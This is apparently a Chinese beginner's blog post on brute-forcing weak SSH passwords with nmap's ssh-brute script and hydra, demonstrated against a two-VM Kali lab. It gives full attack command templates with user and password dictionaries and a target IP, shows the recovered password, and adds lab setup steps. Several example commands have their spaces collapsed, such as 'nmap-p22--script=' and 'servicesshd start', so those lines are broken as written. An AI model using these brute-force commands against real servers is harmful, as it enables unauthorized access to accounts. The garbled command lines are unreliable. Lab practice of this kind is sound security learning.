簡述兩種爆破ssh弱口令的方法

SSH 爲 Secure Shell 的縮寫,由 IETF 的網絡小組(Network Working Group)所制定;SSH 爲建立在應用層基礎上的安全協議。SSH 是目前較可靠,專爲遠程登錄會話和其他網絡服務提供安全性的協議。利用 SSH 協議可以有效防止遠程管理過程中的信息泄露問題。SSH最初是UNIX系統上的一個程序,後來又迅速擴展到其他操作平臺。SSH在正確使用時可彌補網絡中的漏洞。SSH客戶端適用於多種平臺。幾乎所有UNIX平臺—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平臺,都可運行SSH。

簡單來說,在很多運維場景,都會使用ssh遠程操作linux服務器。雖然它相對於telnet已經安全很多,但是也架不住最原始最直接的暴力破解法。以下是小白剛剛學到的兩種辦法:

1、使用nmap爆破:

命令如下:

nmap -p 22 --script=ssh-brute --script-args userdb=用戶字典,passdb=密碼字典 目標機ip

例如:

nmap-p22--script=ssh-brute --script-args userdb=2.txt,passdb=1.txt192.168.229.129

就是在構建好用戶字典2.txt和密碼字典1.txt後,嘗試爆破192.168.229.129的ssh登陸口令。

最終爆破得到密碼爲:aaaaaa。

2、使用hydra爆破:

hydra -l root -P ssh_password.txt 目標機ip ssh  -v

其中-l 指定用戶名,可以使用-L指定用戶名字典文件;-p指定密碼,-P指定密碼字典文件;-v顯示詳細的執行過程。

例如:

hydra-lezpd-P1.txt192.168.229.129ssh-v

就是在構建好密碼字典1.txt後,嘗試爆破192.168.229.129的用戶ezpd的密碼。

同樣得到密碼:aaaaaa。

簡單比較一下:

1、hydra使用起來更靈活。在已知用戶名的情況下,使用hydra會更方便一些。

2、兩個工具都不止於爆破ssh密碼,nmap還能掃描網絡,hydra還能爆破錶單等。

囉嗦一句我的測試環境:用vmware 15 創建的兩個kali虛擬機,一個ip爲192.168.229.128,一個ip爲192.168.229.129。在129這臺創建一個用戶ezpd,密碼爲:aaaaaa。然後啓動ssh服務。

再囉嗦一句:

創建用戶的命令爲:

adduser用戶名

這條命令是引導式的,接下來按照提示輸入密碼,一頓回車就行。

還囉嗦一句:

啓動ssh服務的命令爲:

servicesshd start

最後囉嗦一句:

可以通過passwd文件,查看linux有哪些用戶。命令爲:

cat/etc/passwd


更多內容,歡迎到我的微信公衆號:互聯網小白,交流討論!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章